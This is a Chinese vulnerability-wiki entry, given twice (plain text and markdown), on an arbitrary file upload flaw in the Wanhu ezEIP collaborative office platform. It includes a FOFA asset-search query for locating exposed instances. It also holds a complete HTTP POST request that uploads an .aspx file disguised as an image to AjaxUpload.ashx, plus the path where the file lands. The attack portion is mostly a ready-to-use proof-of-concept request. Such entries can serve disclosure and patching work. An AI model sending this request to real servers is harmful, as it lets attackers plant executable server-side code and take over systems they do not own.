fofamini-wiki

登录白背景

源码

万户协同办公平台 ezEIP 存在任意文件上传漏洞

一、漏洞简介

万户协同办公平台 ezEIP 是一个综合信息基础应用平台。系统完善的用户、权限、角色、对象多层分离权限管理体系，实现分站点、分栏目、分对象的分权管理体系，将站点维护工作分担到各职能部门各岗位。系统管理员负责系统基础设置与运行监控。可进行系统权限管理、站点管理、数据备份、系统参数设置、日志管理等采用ASP.NET安全技术架构，自动生成静态页面提高安全性，同时系统单机登陆许可证制度，严防黑客入侵和盗版网站，系统扩展性极强，可加装多方安全插件。万户协同办公平台 ezEIP 存在任意文件上传漏洞

二、影响版本

万户ezEIP

三、资产测绘

fofaapp="万户网络-ezEIP"

四、漏洞复现

POST /whir_system/Res/assets/js/fileinput/js/AjaxUpload.ashx HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Content-Length: 463
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryn46FImBFEXYi9lZ2
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.2502.80 Safari/537.36
Connection: close

------WebKitFormBoundaryn46FImBFEXYi9lZ2
Content-Disposition: form-data;name="txt_file"; filename="1.aspx"
Content-Type: image/jpeg

hello
------WebKitFormBoundaryn46FImBFEXYi9lZ2
Content-Disposition: form-data; name="\g"

Upload!
------WebKitFormBoundaryn46FImBFEXYi9lZ2--

/uploadfiles/202405255100068868.aspx

原文: https://www.yuque.com/xiaokp7/ocvun2/fgto8gkglue5nghl

# 万户协同办公平台 ezEIP 存在任意文件上传漏洞

# 一、漏洞简介
万户协同办公平台 ezEIP 是一个综合信息基础应用平台。系统完善的用户、权限、角色、对象多层分离权限管理体系，实现分站点、分栏目、分对象的分权管理体系，将站点维护工作分担到各职能部门各岗位。系统管理员负责系统基础设置与运行监控。可进行系统权限管理、站点管理、数据备份、系统参数设置、日志管理等采用ASP.NET安全技术架构，自动生成静态页面提高安全性，同时系统单机登陆许可证制度，严防黑客入侵和盗版网站，系统扩展性极强，可加装多方安全插件。万户协同办公平台 ezEIP 存在任意文件上传漏洞

# 二、影响版本

- 万户ezEIP

# 三、资产测绘

- fofa`app="万户网络-ezEIP"`

![image.png](./img/tl90GS93E0wDjGMH/1716537686268-203b9bc5-a9b3-4106-aa2e-3eae7290a906-624601.png)
![image.png](./img/tl90GS93E0wDjGMH/1716537709500-bd639a50-b0ae-4dfc-805d-af35d68f45ce-678150.png)

# 四、漏洞复现
```
POST /whir_system/Res/assets/js/fileinput/js/AjaxUpload.ashx HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Content-Length: 463
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryn46FImBFEXYi9lZ2
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.2502.80 Safari/537.36
Connection: close

------WebKitFormBoundaryn46FImBFEXYi9lZ2
Content-Disposition: form-data;name="txt_file"; filename="1.aspx"
Content-Type: image/jpeg

hello
------WebKitFormBoundaryn46FImBFEXYi9lZ2
Content-Disposition: form-data; name="\g"

Upload!
------WebKitFormBoundaryn46FImBFEXYi9lZ2--
```
![image.png](./img/tl90GS93E0wDjGMH/1716569546388-f8a921b0-d30b-4b95-8d1e-6691876d5c87-118333.png)
```
/uploadfiles/202405255100068868.aspx
```
![image.png](./img/tl90GS93E0wDjGMH/1716569563059-84ef3653-aa3e-4eee-ae45-b770e1c7f9d8-399178.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fgto8gkglue5nghl>